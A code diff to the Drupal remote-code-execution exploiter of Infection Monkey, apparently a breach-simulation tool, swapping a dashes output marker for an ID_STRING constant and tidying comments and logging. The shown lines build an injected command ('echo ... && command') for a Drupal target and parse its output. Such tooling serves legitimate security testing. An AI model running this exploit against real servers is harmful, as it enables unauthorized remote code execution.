use ID_STRING instead of dashes

monkey/infection_monkey/exploit/drupal.py

@@ -8,6 +8,7 @@ import logging
 import requests
 from urllib.parse import urljoin
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.model import ID_STRING
 from network.network_utils import remove_port
 
 __author__ = 'Ophir Harpaz'
@@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE):
             for node_id in node_ids:
                 node_url = urljoin(url, str(node_id))
                 if self.check_if_exploitable(node_url):
-                    self.add_vuln_url(url)  # Where is this used?
+                    self.add_vuln_url(url)  # This is for report. Should be refactored in the future
                     self.vulnerable_urls.append(node_url)
                     if stop_checking:
                         break
@@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE):
 
     def exploit(self, url, command):
         # pad a easy search replace output:
-        cmd = 'echo ---- && ' + command
+        cmd = f'echo {ID_STRING} && {command}'
         base = remove_port(url)
         payload = {
             "link": [
@@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE):
         if check_drupal_cache(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
     
-        if '----' not in r.text:
+        if ID_STRING not in r.text:
-            LOG.info('[warn] Command execution _may_ have failed')
+            LOG.warning('Command execution _may_ have failed')
     
-        result = r.text.split('----')[-1]
+        result = r.text.split(ID_STRING)[-1]
         LOG.info(f'Drupal exploit result = {result}')
         return result